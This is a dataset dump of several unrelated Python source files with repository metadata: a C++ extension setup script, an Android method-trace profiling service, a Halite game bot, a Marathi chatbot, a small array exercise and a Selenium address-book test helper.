hexsha string | size int64 | ext string | lang string | max_stars_repo_path string | max_stars_repo_name string | max_stars_repo_head_hexsha string | max_stars_repo_licenses list | max_stars_count int64 | max_stars_repo_stars_event_min_datetime string | max_stars_repo_stars_event_max_datetime string | max_issues_repo_path string | max_issues_repo_name string | max_issues_repo_head_hexsha string | max_issues_repo_licenses list | max_issues_count int64 | max_issues_repo_issues_event_min_datetime string | max_issues_repo_issues_event_max_datetime string | max_forks_repo_path string | max_forks_repo_name string | max_forks_repo_head_hexsha string | max_forks_repo_licenses list | max_forks_count int64 | max_forks_repo_forks_event_min_datetime string | max_forks_repo_forks_event_max_datetime string | content string | avg_line_length float64 | max_line_length int64 | alphanum_fraction float64 | qsc_code_num_words_quality_signal int64 | qsc_code_num_chars_quality_signal float64 | qsc_code_mean_word_length_quality_signal float64 | qsc_code_frac_words_unique_quality_signal float64 | qsc_code_frac_chars_top_2grams_quality_signal float64 | qsc_code_frac_chars_top_3grams_quality_signal float64 | qsc_code_frac_chars_top_4grams_quality_signal float64 | qsc_code_frac_chars_dupe_5grams_quality_signal float64 | qsc_code_frac_chars_dupe_6grams_quality_signal float64 | qsc_code_frac_chars_dupe_7grams_quality_signal float64 | qsc_code_frac_chars_dupe_8grams_quality_signal float64 | qsc_code_frac_chars_dupe_9grams_quality_signal float64 | qsc_code_frac_chars_dupe_10grams_quality_signal float64 | qsc_code_frac_chars_replacement_symbols_quality_signal float64 | qsc_code_frac_chars_digital_quality_signal float64 | qsc_code_frac_chars_whitespace_quality_signal float64 | qsc_code_size_file_byte_quality_signal float64 | qsc_code_num_lines_quality_signal float64 | qsc_code_num_chars_line_max_quality_signal float64 | qsc_code_num_chars_line_mean_quality_signal float64 | qsc_code_frac_chars_alphabet_quality_signal float64 | qsc_code_frac_chars_comments_quality_signal float64 | qsc_code_cate_xml_start_quality_signal float64 | qsc_code_frac_lines_dupe_lines_quality_signal float64 | qsc_code_cate_autogen_quality_signal float64 | qsc_code_frac_lines_long_string_quality_signal float64 | qsc_code_frac_chars_string_length_quality_signal float64 | qsc_code_frac_chars_long_word_length_quality_signal float64 | qsc_code_frac_lines_string_concat_quality_signal float64 | qsc_code_cate_encoded_data_quality_signal float64 | qsc_code_frac_chars_hex_words_quality_signal float64 | qsc_code_frac_lines_prompt_comments_quality_signal float64 | qsc_code_frac_lines_assert_quality_signal float64 | qsc_codepython_cate_ast_quality_signal float64 | qsc_codepython_frac_lines_func_ratio_quality_signal float64 | qsc_codepython_cate_var_zero_quality_signal bool | qsc_codepython_frac_lines_pass_quality_signal float64 | qsc_codepython_frac_lines_import_quality_signal float64 | qsc_codepython_frac_lines_simplefunc_quality_signal float64 | qsc_codepython_score_lines_no_logic_quality_signal float64 | qsc_codepython_frac_lines_print_quality_signal float64 | qsc_code_num_words int64 | qsc_code_num_chars int64 | qsc_code_mean_word_length int64 | qsc_code_frac_words_unique null | qsc_code_frac_chars_top_2grams int64 | qsc_code_frac_chars_top_3grams int64 | qsc_code_frac_chars_top_4grams int64 | qsc_code_frac_chars_dupe_5grams int64 | qsc_code_frac_chars_dupe_6grams int64 | qsc_code_frac_chars_dupe_7grams int64 | qsc_code_frac_chars_dupe_8grams int64 | 
qsc_code_frac_chars_dupe_9grams int64 | qsc_code_frac_chars_dupe_10grams int64 | qsc_code_frac_chars_replacement_symbols int64 | qsc_code_frac_chars_digital int64 | qsc_code_frac_chars_whitespace int64 | qsc_code_size_file_byte int64 | qsc_code_num_lines int64 | qsc_code_num_chars_line_max int64 | qsc_code_num_chars_line_mean int64 | qsc_code_frac_chars_alphabet int64 | qsc_code_frac_chars_comments int64 | qsc_code_cate_xml_start int64 | qsc_code_frac_lines_dupe_lines int64 | qsc_code_cate_autogen int64 | qsc_code_frac_lines_long_string int64 | qsc_code_frac_chars_string_length int64 | qsc_code_frac_chars_long_word_length int64 | qsc_code_frac_lines_string_concat null | qsc_code_cate_encoded_data int64 | qsc_code_frac_chars_hex_words int64 | qsc_code_frac_lines_prompt_comments int64 | qsc_code_frac_lines_assert int64 | qsc_codepython_cate_ast int64 | qsc_codepython_frac_lines_func_ratio int64 | qsc_codepython_cate_var_zero int64 | qsc_codepython_frac_lines_pass int64 | qsc_codepython_frac_lines_import int64 | qsc_codepython_frac_lines_simplefunc int64 | qsc_codepython_score_lines_no_logic int64 | qsc_codepython_frac_lines_print int64 | effective string | hits int64 |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
a9c79fb37bd32e1b5430e2572ac344f70eb99c0b | 367 | py | Python | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | alpha_gomoku/cppboard/bitboard/setup.py | YouHuang67/alpha_gomoku | 885690d80f1d34d27bc39cbeee4388b50e3d7a23 | [
"MIT"
] | null | null | null | from distutils.core import setup, Extension
sources = ['board_wrap.cxx', 'board.cpp',
'board_bits.cpp', 'init.cpp',
'lineshapes.cpp', 'pns.cpp', 'shapes.cpp']
module = Extension(
'_board', sources=sources,
extra_compile_args=['/O2'],
language='c++'
)
setup(name='board',
ext_modules=[module],
py_modules=['board']) | 24.466667 | 53 | 0.607629 | 43 | 367 | 5.023256 | 0.627907 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.003448 | 0.209809 | 367 | 15 | 54 | 24.466667 | 0.741379 | 0 | 0 | 0 | 0 | 0 | 0.266304 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.083333 | 0 | 0.083333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
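A minimal build-and-import sketch for the extension above, assuming the listed C++/SWIG sources sit next to setup.py; note that '/O2' is an MSVC-only flag, so a portable build would pick the flag per platform:

# Hedged sketch, not part of the dataset row.
# Build in place with:  python setup.py build_ext --inplace
import sys

opt_flag = '/O2' if sys.platform == 'win32' else '-O2'  # portable optimisation flag
# After a successful build, the SWIG-generated shim is importable as:
#   import board   # pure-Python wrapper around the compiled _board module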
a9c7e7b97223ab3a021b88e0c7b80b98f6271253 | 7,068 | py | Python | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | manafa/services/hunterService.py | RRua/petra-like | cfb6a978f69792845b029d41a1775f36f4d98119 | [
"MIT"
] | null | null | null | import time
from .service import Service
import re
from ..utils.Utils import execute_shell_command
from manafa.utils.Logger import log


class HunterService(Service):
    def __init__(self, boot_time=0, output_res_folder="hunter"):
        Service.__init__(self, output_res_folder)
        self.trace = {}
        self.boot_time = boot_time
        self.end_time = boot_time

    def config(self, **kwargs):
        pass

    def init(self, boot_time=0, **kwargs):
        self.boot_time = boot_time
        self.trace = {}

    def start(self, run_id=None):
        self.clean()

    def get_results_filename(self, run_id):
        if run_id is None:
            run_id = execute_shell_command("date +%s")[1].strip()
        return self.results_dir + "/hunter-%s-%s.log" % (run_id, str(self.boot_time))

    def stop(self, run_id=None):
        filename = self.get_results_filename(run_id)
        time.sleep(1)
        execute_shell_command("adb logcat -d | grep -io \"[<>].*m=example.*]\" > %s" % filename)
        return filename

    def clean(self):
        execute_shell_command("find %s -type f | xargs rm " % self.results_dir)
        execute_shell_command("adb logcat -c")  # or adb logcat -b all -c

    def parseFile(self, filename, functions, instrument=False):
        """`functions` is an array deciding which methods collect instrumentation
        data; `instrument` decides whether that array lists methods to collect
        or methods to discard."""
        with open(filename, 'r') as filehandle:
            lines = filehandle.read().splitlines()
        self.parseHistory(lines, functions, instrument)

    def parseHistory(self, lines_list, functions, instrument=False):
        for i, line in enumerate(lines_list):
            if re.match(r"^>", line):
                before_components = re.split(r'^>', line.replace(" ", ""))
                components = re.split(r'[,=\[\]]', before_components[1])
                function_name = components[0].replace("$", ".")
                add_function = self.verifyFunction(function_name, functions, instrument)
                if add_function:
                    begin_time = components[6]
                    if function_name not in self.trace:
                        self.trace[function_name] = {}
                        self.trace[function_name][0] = {'begin_time': float(begin_time) * (pow(10, -3))}
                    else:
                        self.trace[function_name][len(self.trace[function_name])] = {
                            'begin_time': float(begin_time) * (pow(10, -3))}
            elif re.match(r"^<", line):
                before_components = re.split(r'^<', line.replace(" ", ""))
                components = re.split(r'[,=\[\] ]', before_components[1])
                function_name = components[0].replace("$", ".")
                add_function = self.verifyFunction(function_name, functions, instrument)
                if add_function:
                    end_time = components[6]
                    self.updateTraceReturn(function_name, end_time)
            else:
                log("invalid line " + line)

    def addConsumption(self, function_name, position, consumption, per_component_consumption, metrics):
        self.trace[function_name][position].update(
            {
                'checked': False,
                'consumption': consumption,
                'per_component_consumption': per_component_consumption,
                'metrics': metrics
            }
        )

    def addConsumptionToTraceFile(self, filename, functions, instrument=False):
        split_filename = re.split("/", filename)
        new_filename = "/".join(split_filename[0: len(split_filename) - 1])
        new_filename += '[edited]' + split_filename[len(split_filename) - 1]
        with open(filename, 'r+') as fr, open(new_filename, 'w') as fw:
            for line in fr:
                checked = False
                function_begin = ">"
                if re.match(r"^>", line):
                    before_components = re.split(r'^>', line)
                    components = re.split(r'[,=\[\] ]', before_components[1])
                    function_name = components[0].replace("$", ".")
                elif re.match(r"^<", line):
                    before_components = re.split(r'^<', line)
                    components = re.split(r'[,=\[\] ]', before_components[1])
                    function_name = components[0].replace("$", ".")
                    checked = True
                    function_begin = "<"
                # assumes every line starts with '>' or '<'; otherwise function_name is stale or unbound
                add_function = self.verifyFunction(function_name, functions, instrument)
                if add_function:
                    # note: 'time' shadows the time module inside this loop
                    consumption, time = self.returnConsumptionAndTimeByFunction(function_name, checked)
                    new_line = function_begin + function_name + " [m=example, " + 'cpu = ' + str(
                        consumption) + ', t = ' + str(time) + ']\n'
                    fw.write(new_line)
        execute_shell_command("rm %s" % filename)
        return new_filename

    def returnConsumptionAndTimeByFunction(self, function_name, checked):
        """Returns cpu consumption instead of total consumption."""
        consumption = 0.0
        cpu_consumption = 0.0
        da_time = 0.0
        for i, times in enumerate(self.trace[function_name]):
            results = self.trace[function_name][i]
            if not results['checked']:
                if checked:
                    consumption = results['consumption']
                    per_component_consumption = results['per_component_consumption']
                    cpu_consumption = per_component_consumption['cpu']
                    da_time = results['end_time'] if 'end_time' in results else self.end_time
                    self.updateChecked(function_name, i)
                    return cpu_consumption, da_time
                da_time = results['begin_time']
                return cpu_consumption, da_time
        return cpu_consumption, da_time

    def updateChecked(self, function_name, position):
        self.trace[function_name][position].update(
            {
                'checked': True
            }
        )

    def updateTraceReturn(self, function_name, end_time):
        i = len(self.trace[function_name]) - 1 if function_name in self.trace else -1
        while i >= 0:
            times = self.trace[function_name][i]
            if 'end_time' not in times:
                end = float(end_time) * (pow(10, -3))
                times.update({'end_time': end})
                if end > self.end_time:
                    self.end_time = end
                break
            i -= 1

    # Verify whether the function is to be added to hunter_trace or used to get consumption
    @staticmethod
    def verifyFunction(function_name, functions, add_function=False):
        if len(functions) == 0:
            return True
        res = not add_function
        for function in functions:
            if function in function_name:
                res = not res
                break
        return res
| 41.822485 | 104 | 0.563243 | 756 | 7,068 | 5.070106 | 0.19709 | 0.090791 | 0.044352 | 0.054787 | 0.342552 | 0.258544 | 0.208453 | 0.186538 | 0.171406 | 0.171406 | 0 | 0.007971 | 0.325552 | 7,068 | 168 | 105 | 42.071429 | 0.796098 | 0.038908 | 0 | 0.224638 | 0 | 0 | 0.0582 | 0.007462 | 0 | 0 | 0 | 0 | 0 | 1 | 0.108696 | false | 0.007246 | 0.036232 | 0 | 0.210145 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
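A hedged driver sketch for the service above; it assumes an Android device reachable over adb and an app that logs Hunter-style '>'/'<' markers (the filter list and run id are illustrative):

# Usage sketch: method names come from the class above, everything else is assumed.
from manafa.services.hunterService import HunterService

hunter = HunterService(boot_time=0)
hunter.init(boot_time=0)
hunter.start()
# ... exercise the instrumented app here ...
log_file = hunter.stop(run_id="demo")
# Keep only methods whose names contain these substrings (instrument=True keeps, False discards):
hunter.parseFile(log_file, functions=["onCreate", "onResume"], instrument=True)
print(hunter.trace)  # {function_name: {call_idx: {'begin_time': ..., 'end_time': ...}}}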
a9c9cb26caef7f3a07130091e0579b96a33abecb | 1,650 | py | Python | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | Basic_if_then/BH4-test.py | BH4/Halite3-bots | 97eb4dcab6bccbfd1649bbac74ef06f0e22035de | [
"MIT"
] | null | null | null | import hlt
from hlt import constants
import logging
# Import my stuff
import strategies
import helpers
game = hlt.Game()
# Pre-processing area
ship_status = {}
ship_destination = {}


class parameters():
    def __init__(self):
        # Ship numbers
        self.max_ships = 30
        self.min_ships = 2

        # dropoff parameters
        self.large_distance_from_drop = 10
        self.farthest_allowed_dropoff = game.game_map.width/2
        self.dropoff_dense_requirement = constants.DROPOFF_COST
        self.max_dropoffs = 1

        # Halite collection parameters
        self.minimum_useful_halite = constants.MAX_HALITE/10
        self.sufficient_halite_for_droping = constants.MAX_HALITE
        self.density_kernal_side_length = 3
        self.search_region = 1
        self.number_of_dense_spots_to_check = 10
        self.explore_dense_requirement = self.minimum_useful_halite*self.density_kernal_side_length**2

        # Turn based parameters
        self.turn_to_stop_spending = 300
        self.crash_return_fudge = 10  # constants.MAX_TURNS - game.game_map.width/2


params = parameters()

# Start
game.ready("BH4-test")
logging.info("Successfully created bot! Player ID is {}.".format(game.my_id))

# Game Loop
while True:
    hd = helpers.halite_density(game.game_map, params)
    m = max([max(x) for x in hd])
    # m <= constants.MAX_HALITE*params.density_kernal_side_length**2
    if m > 0*params.explore_dense_requirement:
        strategies.expand(game, ship_status, ship_destination, params)
    else:
        logging.info("Started vacuum")
        strategies.vacuum(game, ship_status, ship_destination, params)
| 26.612903 | 102 | 0.704848 | 218 | 1,650 | 5.055046 | 0.440367 | 0.043557 | 0.038113 | 0.068058 | 0.176951 | 0.123412 | 0 | 0 | 0 | 0 | 0 | 0.017692 | 0.212121 | 1,650 | 61 | 103 | 27.04918 | 0.83 | 0.146061 | 0 | 0 | 0 | 0 | 0.04578 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.028571 | false | 0 | 0.142857 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
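`helpers.halite_density` is not shown in this file; a plausible stand-in that matches how it is consumed above (a 2-D grid whose maximum is compared against `explore_dense_requirement = minimum_useful_halite * side**2`) could look like this, assuming the standard Halite III starter-kit map API:

# Hypothetical sketch of a density helper; the real helpers.halite_density may differ.
import hlt

def halite_density(game_map, params):
    k = params.density_kernal_side_length // 2
    w, h = game_map.width, game_map.height
    grid = [[0] * w for _ in range(h)]
    for y in range(h):
        for x in range(w):
            # Sum halite in a side-by-side window, wrapping around the toroidal map.
            grid[y][x] = sum(
                game_map[hlt.Position((x + dx) % w, (y + dy) % h)].halite_amount
                for dy in range(-k, k + 1) for dx in range(-k, k + 1))
    return grid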
a9ca3bbd491dc6f1f8700dab6b863d90e4dcb170 | 2,481 | py | Python | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | multi_linugual_chatbot/mbot.py | HrushikeshShukla/multilingual_chatbot | 696b403ef4e5482e2f670924b557dd17375fc5a9 | [
"Apache-2.0"
] | null | null | null | # importing dependencies
import re
import inltk
import nltk
nltk.download('punkt')
import io
import random
import string
import warnings
warnings.filterwarnings('ignore')
import numpy as np
from sklearn.feature_extraction.text import TfidfVectorizer
from sklearn.metrics.pairwise import cosine_similarity
from googlesearch import search

## Setting up Marathi stopwords
lang = 'mr'
f = open("marathi_corpus/stop_marathi.txt", 'r')
stop_words = f.readlines()
stm = []
for i in stop_words:
    i = i.strip()  # str.strip() returns a new string, so the result must be kept
    stm.append(re.sub('\n', "", i))
f.close()

# reading corpus
f = open('marathi_corpus/covid.txt')
raw = f.read()
f.close()
sent_tokens = nltk.sent_tokenize(raw)
word_tokens = nltk.word_tokenize(raw)

# text preprocessing:
remove_punct_dict = dict((ord(punct), None) for punct in string.punctuation)  # removing punctuation


def preprocess(text):
    return nltk.word_tokenize(text.translate(remove_punct_dict))  # working on word tokens


## greetings
greeting_inputs = ("नमस्कार", "हाय")
greeting_res = ("नमस्कार", "हाय")


def greet_sent(sentence):
    for word in sentence.split():
        if word in greeting_inputs:
            return random.choice(greeting_res)


thank_list = ['आभार', 'धन्यवाद', 'बाय', "खूप खूप धन्यवाद"]


def bye(sentence):
    for word in sentence.split():
        if word in thank_list:
            return random.choice(thank_list)


# return from knowledge base
def response(user_response):
    bot_response = ''
    sent_tokens.append(user_response)
    tfvec = TfidfVectorizer(tokenizer=preprocess, stop_words=stm)
    tfidf = tfvec.fit_transform(sent_tokens)
    vals = cosine_similarity(tfidf[-1], tfidf)
    idx = vals.argsort()[0][-2]
    flat = vals.flatten()
    flat.sort()
    sent_tokens.pop()
    req_tfidf = flat[-2]
    if req_tfidf == 0:
        bot_response = bot_response + "मला माफ करा. मला कळलं नाही तुम्हाला काय म्हणायचंय ते."
        bot_response = bot_response + "\nमला हे इंटरनेटवर मिळाले:"
        query = user_response
        for url in search(query, lang=lang, num_results=3):
            bot_response = bot_response + "\n" + url
        return bot_response
    else:
        bot_response = bot_response + sent_tokens[idx]
        return bot_response


# chatting system
def chat(user_response):
    bot_response = ''
    if bye(user_response) is not None:
        bot_response = bot_response + bye(user_response)
        return (bot_response, False)
    elif greet_sent(user_response) is not None:
        bot_response = bot_response + greet_sent(user_response)
        return (bot_response, True)
    else:
        bot_response = bot_response + response(user_response)
        return (bot_response, True)
| 28.517241 | 94 | 0.731963 | 417 | 2,481 | 4.285372 | 0.369305 | 0.129267 | 0.095691 | 0.086178 | 0.20817 | 0.133184 | 0.096251 | 0.053721 | 0.042529 | 0 | 0 | 0.002809 | 0.139057 | 2,481 | 86 | 95 | 28.848837 | 0.816479 | 0.070536 | 0 | 0.166667 | 0 | 0.013889 | 0.08762 | 0.023976 | 0 | 0 | 0 | 0 | 0 | 1 | 0.069444 | false | 0 | 0.152778 | 0.013889 | 0.319444 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
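A minimal console loop around chat(); a sketch that assumes the corpus and stopword files above are present so the module imports cleanly:

# Hedged usage sketch: drive the chatbot from a terminal until bye() ends the session.
if __name__ == "__main__":
    keep_going = True
    while keep_going:
        reply, keep_going = chat(input("> "))
        print(reply)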
a9cc574d34510a5a7c799bfb6ad7da4119b10d52 | 742 | py | Python | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | 1 | 2021-12-06T05:09:10.000Z | 2021-12-06T05:09:10.000Z | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | null | null | null | practiceset/hk/fraction_of_plusMinus.py | dipsuji/Phython-Learning | 78689d3436a8573695b869a19457875ac77fcee4 | [
"Apache-2.0"
] | 1 | 2021-12-06T05:09:16.000Z | 2021-12-06T05:09:16.000Z | def fraction_plusMinus(arr):
    count_pos = 0
    count_neg = 0
    count_0 = 0
    arr_len = len(arr)
    # print(arr_len)
    # print(arr)
    for i in range(0, len(arr)):
        if arr[i] > 0:
            count_pos += 1
        elif arr[i] < 0:
            count_neg += 1
        elif arr[i] == 0:
            count_0 += 1
    propor_pos = round(count_pos / arr_len, 6)  # round each proportion to 6 decimal places
    propor_neg = round(count_neg / arr_len, 6)
    propor_zero = round(count_0 / arr_len, 6)
    # print(propor_pos, propor_neg, propor_zero, sep=' ', end='\n')
    print(propor_pos, end='\n')
    print(propor_neg, end='\n')
    print(propor_zero, end='\n')

fraction_plusMinus([-2, 3, -4, 0, 5, 1])
fraction_plusMinus([5, 2, -4, 0, 0, 1, -3])
| 24.733333 | 67 | 0.56469 | 119 | 742 | 3.277311 | 0.226891 | 0.123077 | 0.038462 | 0.076923 | 0.169231 | 0.076923 | 0 | 0 | 0 | 0 | 0 | 0.048872 | 0.283019 | 742 | 29 | 68 | 25.586207 | 0.684211 | 0.117251 | 0 | 0 | 0 | 0 | 0.009217 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0 | 0 | 0.05 | 0.15 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
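Worked example for the first call above: 3 positive, 2 negative, and 1 zero out of 6 elements, so with 6-decimal rounding the function prints:

# fraction_plusMinus([-2, 3, -4, 0, 5, 1]) output:
# 0.5
# 0.333333
# 0.166667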
a9ccbe1dd76a9b926989e24973b853a53bc7aeb8 | 7,731 | py | Python | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | fixture/contacts.py | annovikov/Python_education | f6d731c81d1cbfdd1085fb9893c1c123e4eae64f | [
"Apache-2.0"
] | null | null | null | from model.contact import ContactGroup
import re


class ContactHelper:
    def __init__(self, app):
        self.app = app

    def add_new(self, contactgroup):
        wd = self.app.wd
        wd.find_element_by_link_text("add new").click()
        self.fill_contact_form(contactgroup)
        wd.find_element_by_xpath("//div[@id='content']/form/input[21]").click()
        self.contact_cash = None

    def fill_contact_form(self, contactgroup):
        wd = self.app.wd
        self.change_fields("firstname", contactgroup.firstname)
        self.change_fields("lastname", contactgroup.lastname)
        self.change_fields("nickname", contactgroup.nickname)
        self.change_fields("company", contactgroup.company)
        self.change_fields("address", contactgroup.address)
        self.change_fields("home", contactgroup.home)
        self.change_fields("work", contactgroup.work)
        self.change_fields("mobile", contactgroup.mobile)
        self.change_fields("email", contactgroup.email)
        self.change_fields("email2", contactgroup.email2)
        self.change_fields("address2", contactgroup.address2)
        self.change_fields("middlename", contactgroup.middlename)
        self.change_fields("notes", contactgroup.notes)

    def change_fields(self, field_name, text):
        wd = self.app.wd
        if text is not None:
            wd.find_element_by_name(field_name).click()
            wd.find_element_by_name(field_name).clear()
            wd.find_element_by_name(field_name).send_keys(text)

    def modify_by_index(self, index, new_contactgroup):
        wd = self.app.wd
        self.open_contacts_page()
        # self.select_contact_by_index(index)
        # search Modify btn with index
        wd.find_element_by_xpath(".//*[@id='maintable']/tbody/tr[" + str(index + 2) + "]/td[8]/a/img").click()
        self.fill_contact_form(new_contactgroup)
        wd.find_element_by_name("update").click()
        self.contact_cash = None

    def modify_by_id(self, id, new_contactgroup):
        wd = self.app.wd
        self.open_contacts_page()
        # self.select_contact_by_index(index)
        # search Modify btn with index
        wd.find_element_by_xpath(".//*[@id='maintable']/tbody/tr[" + str(id + 2) + "]/td[8]/a/img").click()
        self.fill_contact_form(new_contactgroup)
        wd.find_element_by_name("update").click()
        self.contact_cash = None

    def modify_first(self):
        self.modify_by_index(0)

    def open_contacts_page(self):
        wd = self.app.wd
        if not (wd.current_url.endswith("/addressbook/") > 0):
            wd.find_element_by_link_text("home").click()

    def select_add_group_from_list(self, id):
        wd = self.app.wd
        # wd.find_elements_by_xpath(".//*[@id='content']/form[2]/div[4]/select/option")[index2].click()
        wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[4]//option[@value='%s']" % id).click()
        wd.find_element_by_name("add").click()

    def select_group_for_deletion(self, id):
        wd = self.app.wd
        wd.find_element_by_xpath(".//*[@id='right']//option[@value='%s']" % id).click()

    def delete_contact_from_group(self):
        wd = self.app.wd
        wd.find_element_by_name("remove").click()

    def delete_by_index(self, index):
        wd = self.app.wd
        self.open_contacts_page()
        # select first group
        self.select_contact_by_index(index)
        # delete
        wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[2]/input").click()
        wd.switch_to_alert().accept()
        self.contact_cash = None

    def delete_by_id(self, id):
        wd = self.app.wd
        self.open_contacts_page()
        # select first group
        self.select_contact_by_id(id)
        # delete
        wd.find_element_by_xpath(".//*[@id='content']/form[2]/div[2]/input").click()
        wd.switch_to_alert().accept()
        self.contact_cash = None

    def delete_first(self):
        self.delete_by_index(0)

    def select_contact_by_index(self, index):
        wd = self.app.wd
        wd.find_elements_by_name("selected[]")[index].click()

    def select_contact_by_id(self, id):
        wd = self.app.wd
        wd.find_element_by_xpath(".//*[@id='%s']" % id).click()

    def select_first(self):
        wd = self.app.wd
        wd.find_element_by_name("selected[]").click()

    def count(self):
        wd = self.app.wd
        self.open_contacts_page()
        return len(wd.find_elements_by_name("selected[]"))

    contact_cash = None  # cached contact list ("cash" is the original spelling of "cache")

    def get_contact_list(self):
        if self.contact_cash is None:
            wd = self.app.wd
            self.open_contacts_page()
            self.contact_cash = []
            for element in wd.find_elements_by_xpath("//tbody/tr[@name='entry']"):
                firstname = element.find_element_by_xpath("td[3]").text
                lastname = element.find_element_by_xpath("td[2]").text
                id = element.find_element_by_name("selected[]").get_attribute("value")
                all_phones = element.find_element_by_xpath("td[6]").text
                all_emails = element.find_element_by_xpath("td[5]").text
                address = element.find_element_by_xpath("td[4]").text
                self.contact_cash.append(ContactGroup(firstname=firstname, lastname=lastname, id=id, address=address,
                                                      all_emails_from_home_page=all_emails,
                                                      all_phones_from_home_page=all_phones))
        return list(self.contact_cash)

    def open_contact_to_edit_by_index(self, index):
        wd = self.app.wd
        self.open_contacts_page()
        row = wd.find_elements_by_name("entry")[index]
        cell = row.find_elements_by_tag_name("td")[7]
        cell.find_element_by_tag_name("a").click()

    def open_contact_view_by_index(self, index):
        wd = self.app.wd
        self.open_contacts_page()
        row = wd.find_elements_by_name("entry")[index]
        cell = row.find_elements_by_tag_name("td")[6]
        cell.find_element_by_tag_name("a").click()

    def get_contact_info_from_edit_page(self, index):
        wd = self.app.wd
        self.open_contact_to_edit_by_index(index)
        firstname = wd.find_element_by_name("firstname").get_attribute("value")
        lastname = wd.find_element_by_name("lastname").get_attribute("value")
        id = wd.find_element_by_name("id").get_attribute("value")
        address = wd.find_element_by_name("address").text
        homephone = wd.find_element_by_name("home").get_attribute("value")
        workphone = wd.find_element_by_name("work").get_attribute("value")
        mobilephone = wd.find_element_by_name("mobile").get_attribute("value")
        secondaryphone = wd.find_element_by_name("phone2").get_attribute("value")
        email = wd.find_element_by_name("email").get_attribute("value")
        email2 = wd.find_element_by_name("email2").get_attribute("value")
        email3 = wd.find_element_by_name("email3").get_attribute("value")
        return ContactGroup(firstname=firstname, lastname=lastname, id=id, address=address, homephone=homephone,
                            mobilephone=mobilephone, workphone=workphone,
                            secondaryphone=secondaryphone, email=email, email2=email2, email3=email3)

    def get_contact_from_view_page(self, index):
        wd = self.app.wd
        self.open_contact_view_by_index(index)
        text = wd.find_element_by_id("content").text
        homephone = re.search("H: (.*)", text).group(1)
        workphone = re.search("W: (.*)", text).group(1)
        mobilephone = re.search("M: (.*)", text).group(1)
        secondaryphone = re.search("P: (.*)", text).group(1)
        return ContactGroup(homephone=homephone, mobilephone=mobilephone, workphone=workphone,
                            secondaryphone=secondaryphone)
